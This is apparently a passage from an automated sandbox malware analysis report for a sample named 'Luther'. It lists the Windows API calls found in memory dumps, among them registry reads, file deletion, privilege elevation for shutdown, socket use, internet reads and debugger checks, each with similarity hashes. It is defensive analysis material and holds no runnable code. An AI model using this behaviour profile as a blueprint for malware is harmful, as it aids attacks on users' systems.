                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00EBCB47
                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00EBCBB4
                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00EBCC49
                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00EBCC9A
                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00EBCD43
                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00EBCDE2
                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00EBCDEF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                          • String ID:
                                                                                                          • API String ID: 3102970594-0
                                                                                                          • Opcode ID: 1281c9b75a400c64cb539d3092f2d62e87650a8aedcaa1c25a13aa9c1e6e724e
                                                                                                          • Instruction ID: b5cfbf72348e7536651f7b33d726b078b19e065c0028dcd2534c611d106b3805
                                                                                                          • Opcode Fuzzy Hash: 1281c9b75a400c64cb539d3092f2d62e87650a8aedcaa1c25a13aa9c1e6e724e
                                                                                                          • Instruction Fuzzy Hash: D60263756082009FD714DF28C895E6ABBE5FF48308F1894ADF44AEB2A2D731ED46CB51
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E35851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E355D1,?,?,00E74B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E35871
                                                                                                            • Part of subcall function 00E9EAB0: GetFileAttributesW.KERNEL32(?,00E9D840), ref: 00E9EAB1
                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00E9D9CD
                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00E9DA88
                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 00E9DA9B
                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 00E9DAB8
                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E9DAE2
                                                                                                            • Part of subcall function 00E9DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00E9DAC7,?,?), ref: 00E9DB5D
                                                                                                          • FindClose.KERNEL32(00000000,?,?,?), ref: 00E9DAFE
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00E9DB0F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                          • String ID: \*.*
                                                                                                          • API String ID: 1946585618-1173974218
                                                                                                          • Opcode ID: f6f31156c3430c3e7d55f23a3971afb63854dde8589f2cc1e8f3a46ed5c64d78
                                                                                                          • Instruction ID: 910f53dc502c7077241f5b6506430a9ec2c1b00090fd4e28f28556f72b7c43e5
                                                                                                          • Opcode Fuzzy Hash: f6f31156c3430c3e7d55f23a3971afb63854dde8589f2cc1e8f3a46ed5c64d78
                                                                                                          • Instruction Fuzzy Hash: 1B615E3180911DAECF05EBA0DD969EDBBB5AF14304F6061A9E502771A1EB726F09CB60
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1737998785-0
                                                                                                          • Opcode ID: 842f756e9a10b755da0898b54a3211d4ec51bd5fc5b3730a5f6650e30f138675
                                                                                                          • Instruction ID: 51dbd6c2e1e5f0a7e0953ae4fb069be2d4401998c9188cbef41a32406ba8c9af
                                                                                                          • Opcode Fuzzy Hash: 842f756e9a10b755da0898b54a3211d4ec51bd5fc5b3730a5f6650e30f138675
                                                                                                          • Instruction Fuzzy Hash: A4418B31604601AFD314CF55D888F55BBE4EF49319F1484B9E859AF662CB36FC42CB90
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E92010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E9205A
                                                                                                            • Part of subcall function 00E92010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E92087
                                                                                                            • Part of subcall function 00E92010: GetLastError.KERNEL32 ref: 00E92097
                                                                                                          • ExitWindowsEx.USER32(?,00000000), ref: 00E9F249
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                          • String ID: $ $@$SeShutdownPrivilege
                                                                                                          • API String ID: 2234035333-3163812486
                                                                                                          • Opcode ID: ec6d5a810ed0ca8deba1f3410bcea7e739434f34a8ea52dfe3a265789107a40e
                                                                                                          • Instruction ID: 25d7b486567e43330c4b0c3bbc00851ca37512fa9dc453ad709d269a70289b08
                                                                                                          • Opcode Fuzzy Hash: ec6d5a810ed0ca8deba1f3410bcea7e739434f34a8ea52dfe3a265789107a40e
                                                                                                          • Instruction Fuzzy Hash: E901F97A6142146FEF1463B89C8AFFF72AC9B08354F151535FD12F21F2D5615D059190
                                                                                                          APIs
                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00E756C2,?,?,00000000,00000000), ref: 00EA3A1E
                                                                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00E756C2,?,?,00000000,00000000), ref: 00EA3A35
                                                                                                          • LoadResource.KERNEL32(?,00000000,?,?,00E756C2,?,?,00000000,00000000,?,?,?,?,?,?,00E366CE), ref: 00EA3A45
                                                                                                          • SizeofResource.KERNEL32(?,00000000,?,?,00E756C2,?,?,00000000,00000000,?,?,?,?,?,?,00E366CE), ref: 00EA3A56
                                                                                                          • LockResource.KERNEL32(00E756C2,?,?,00E756C2,?,?,00000000,00000000,?,?,?,?,?,?,00E366CE,?), ref: 00EA3A65
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                          • String ID: SCRIPT
                                                                                                          • API String ID: 3051347437-3967369404
                                                                                                          • Opcode ID: 2be76e7c337d2fa60e60d4fd73506c135fb04ade711ff1383acb1e5d00931500
                                                                                                          • Instruction ID: 9923b3cea0c0c998aa5eaaa4454861dbd94049e73a572cd8ec80f6e1e99d1644
                                                                                                          • Opcode Fuzzy Hash: 2be76e7c337d2fa60e60d4fd73506c135fb04ade711ff1383acb1e5d00931500
                                                                                                          • Instruction Fuzzy Hash: 6E117C71200701BFD7258B26DC48F277BBDEBC9B54F14427CB452EA660DB72ED058620
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E91900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E91916
                                                                                                            • Part of subcall function 00E91900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E91922
                                                                                                            • Part of subcall function 00E91900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E91931
                                                                                                            • Part of subcall function 00E91900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E91938
                                                                                                            • Part of subcall function 00E91900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E9194E
                                                                                                          • GetLengthSid.ADVAPI32(?,00000000,00E91C81), ref: 00E920FB
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E92107
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00E9210E
                                                                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 00E92127
                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,00E91C81), ref: 00E9213B
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00E92142
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                          • String ID:
                                                                                                          • API String ID: 3008561057-0
                                                                                                          • Opcode ID: 90ea3337b0cdbf4c2df9ea805647825fe3c0b394bbe6c745c15003ac4f54aabf
                                                                                                          • Instruction ID: f7b69026edb8d9e17943cb94679605a2423c940662168bf012e2b8f14d4ff9ff
                                                                                                          • Opcode Fuzzy Hash: 90ea3337b0cdbf4c2df9ea805647825fe3c0b394bbe6c745c15003ac4f54aabf
                                                                                                          • Instruction Fuzzy Hash: 8A11AC72502205FFDF109B66CC09FAE7BA9EF44359F14802CEA41B7220C7369945CB64
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333
                                                                                                          • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00EAA5BD
                                                                                                          • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00EAA6D0
                                                                                                            • Part of subcall function 00EA42B9: GetInputState.USER32 ref: 00EA4310
                                                                                                            • Part of subcall function 00EA42B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EA43AB
                                                                                                          • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00EAA5ED
                                                                                                          • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00EAA6BA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                          • String ID: *.*
                                                                                                          • API String ID: 1972594611-438819550
                                                                                                          • Opcode ID: c5f468e2c47894c75521b86b1378edc108176742da7b96589352f665ab361ea5
                                                                                                          • Instruction ID: 7d901cfc3a1c663cdedfbdbab2ab73b776f158cf6ae7ba746a5d84a6a10ffd8b
                                                                                                          • Opcode Fuzzy Hash: c5f468e2c47894c75521b86b1378edc108176742da7b96589352f665ab361ea5
                                                                                                          • Instruction Fuzzy Hash: 4541627190030AAFCF14DF64CD49AEEBBB4EF4A314F185069E805B61A1EB31AE45CF61
                                                                                                          APIs
                                                                                                          • DefDlgProcW.USER32(?,?), ref: 00E3233E
                                                                                                          • GetSysColor.USER32(0000000F), ref: 00E32421
                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 00E32434
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$Proc
                                                                                                          • String ID:
                                                                                                          • API String ID: 929743424-0
                                                                                                          • Opcode ID: 6357c53bcf466881b80ff78e0cb8f6c3c34ccd2e6a379886ac6d270327c3af52
                                                                                                          • Instruction ID: 0b8ae7f69acc33a9b30d2adcb83d5f8d6bf4fad0175d50f1ca00eb2e36c129ad
                                                                                                          • Opcode Fuzzy Hash: 6357c53bcf466881b80ff78e0cb8f6c3c34ccd2e6a379886ac6d270327c3af52
                                                                                                          • Instruction Fuzzy Hash: DC811BB0104405BEE22D653D4D9CEBF2DDEDB42308F15A11EF382F6596C96A8F42E276
                                                                                                          APIs
                                                                                                            • Part of subcall function 00EB3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00EB3AD7
                                                                                                            • Part of subcall function 00EB3AAB: _wcslen.LIBCMT ref: 00EB3AF8
                                                                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00EB22BA
                                                                                                          • WSAGetLastError.WSOCK32 ref: 00EB22E1
                                                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00EB2338
                                                                                                          • WSAGetLastError.WSOCK32 ref: 00EB2343
                                                                                                          • closesocket.WSOCK32(00000000), ref: 00EB2372
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 1601658205-0
                                                                                                          • Opcode ID: 572d9c3e13ba3663fccc5ba20f116e7d018a7d762f5e12f60f89e93d94274e0c
                                                                                                          • Instruction ID: 43493107ab3a8f5e746e6cbf5915e88b7018ec4db92c91ac7dbfa8f7157a5505
                                                                                                          • Opcode Fuzzy Hash: 572d9c3e13ba3663fccc5ba20f116e7d018a7d762f5e12f60f89e93d94274e0c
                                                                                                          • Instruction Fuzzy Hash: 5951A471A00200AFD714AF24C88AF6A7BE59F44758F54909CF945BF3D3C675AD42CBA1
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                          • String ID:
                                                                                                          • API String ID: 292994002-0
                                                                                                          • Opcode ID: da90c4caf7e4f92a7177b0d98c7f9974db7c24160823f0ea9be1fe752a42ec7d
                                                                                                          • Instruction ID: d456ca59f1af27f80e0691edf35dc930f6d982072bcdc20371422cba9498a1c6
                                                                                                          • Opcode Fuzzy Hash: da90c4caf7e4f92a7177b0d98c7f9974db7c24160823f0ea9be1fe752a42ec7d
                                                                                                          • Instruction Fuzzy Hash: B621BF357042108FD7119F26C984F5A7BE5AF85328B18907EE94AAB351DB73EC43CB90
                                                                                                          APIs
                                                                                                          • InternetReadFile.WININET(?,?,00000400,?), ref: 00EAD8CE
                                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 00EAD92F
                                                                                                          • SetEvent.KERNEL32(?,?,00000000), ref: 00EAD943
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorEventFileInternetLastRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 234945975-0
                                                                                                          • Opcode ID: baaf9649e678b4c850f7a721cfe1b79ddba94e155b8b6ba71c20b8a482df86f9
                                                                                                          • Instruction ID: 36cd74dd9ce20a64b1273b71254aa008a28bddabe2505e55b3192c680dacec33
                                                                                                          • Opcode Fuzzy Hash: baaf9649e678b4c850f7a721cfe1b79ddba94e155b8b6ba71c20b8a482df86f9
                                                                                                          • Instruction Fuzzy Hash: A221E0B1508704AFE7208F66CC48BAB77F8EB86318F10542AE646B6541D7B0FA098B50
                                                                                                          APIs
                                                                                                          • lstrlenW.KERNEL32(?,00E746AC), ref: 00E9E482
                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00E9E491
                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00E9E4A2
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00E9E4AE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2695905019-0
                                                                                                          • Opcode ID: c86d966c76a967073eae98fa98bafd6bc76d61f09dbd7d09a1fbff8c6796ea20
                                                                                                          • Instruction ID: 138f6a22d24cfdacc784fd7c16cdcdd6c64317771b530c138690f22edcbad426
                                                                                                          • Opcode Fuzzy Hash: c86d966c76a967073eae98fa98bafd6bc76d61f09dbd7d09a1fbff8c6796ea20
                                                                                                          • Instruction Fuzzy Hash: B1F055304089146BD214A73CAC0DCAF776DAF02339B044325F932E22F0DB7AAC8A8281
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LocalTime
                                                                                                          • String ID: %.3d$X64
                                                                                                          • API String ID: 481472006-1077770165
                                                                                                          • Opcode ID: 4aace4aa95ab42e9d8d14be0877bcf7b697a4edf2fe766427012fbbb2130dcff
                                                                                                          • Instruction ID: e6cb43fad51dc0fd692114d860e8e236349564e79955a8bd3014efd46211f094
                                                                                                          • Opcode Fuzzy Hash: 4aace4aa95ab42e9d8d14be0877bcf7b697a4edf2fe766427012fbbb2130dcff
                                                                                                          • Instruction Fuzzy Hash: 36D012B1C08218DACB80A6909D48CF9737CBB18700F506462F90EB1110F620D908B721
                                                                                                          APIs
                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00E62A8A
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00E62A94
                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00E62AA1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                          • String ID:
                                                                                                          • API String ID: 3906539128-0
                                                                                                          • Opcode ID: 826fb804a9dce934726eb40acd4271e0593ff3a4168ed1fe3abab7c532277001
                                                                                                          • Instruction ID: 028c65af6a59d493eeb552673c99eca164adfb41e992e12966d19e71b822c8fa
                                                                                                          • Opcode Fuzzy Hash: 826fb804a9dce934726eb40acd4271e0593ff3a4168ed1fe3abab7c532277001
                                                                                                          • Instruction Fuzzy Hash: 9231F57494122C9BCB21DF68DD88BDCBBB8AF08311F5055EAE80CA6260E7719F858F45
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E5014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00E509D8
                                                                                                            • Part of subcall function 00E5014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00E509F5
                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E9205A
                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E92087
                                                                                                          • GetLastError.KERNEL32 ref: 00E92097
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
